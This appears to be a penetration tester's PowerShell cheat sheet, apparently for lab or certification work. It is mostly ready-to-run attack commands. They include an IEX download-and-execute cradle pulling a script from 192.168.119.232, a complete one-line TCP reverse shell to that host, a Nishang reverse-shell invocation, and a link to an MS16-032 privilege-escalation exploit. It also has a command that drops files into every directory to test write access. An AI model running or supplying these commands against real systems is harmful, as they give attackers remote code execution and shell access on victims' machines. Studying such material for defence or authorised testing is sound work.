[-]======================================[-]
    powershell 
[-]======================================[-]

- ---] References
=====================
# Powershell Payload Execution and Evasion
https://medium.com/swlh/fun-with-powershell-payload-execution-and-evasion-f5051fd149b2



- ---] Quick Commands
=====================

# Invoke Expressions (IEX) - Download and run ps1 (Make sure function is called at bottom of ps1 script)
IEX(New-Object Net.WebClient).downloadString('http://192.168.119.232/Invoke-PowershellTcp.ps1')

# Reverse powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.232',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

- ---] Enumeration
=====================

# Can you write here?
cd / ;Get-ChildItem -Recurse -Directory | ForEach-Object {New-Item -ItemType file -Path "$($_.FullName)" -Name "I CAN WRITE HERE!" }

# Systeminfo - parsed
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"


- ---] Nishang
=====================

# Powershell shells location
/usr/share/windows-resources/nishang/Shells

# Reverse shell
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444


- ---] Exploits
====================

# MS16-032 Powershell Empire - Allows for command option (for non-interactive / terminal based exploits)
https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1



- ---] Notes
====================

# x64-bit Binaries
C:\Windows\SysNative\

# x86-bit Binaries
C:\Windows\SysWow64
C:\Windows\System32

# Full path to x64-bit powershell
C:\Windows\SysNative\WindowsPowershell\v1.0\Powershell.exe 
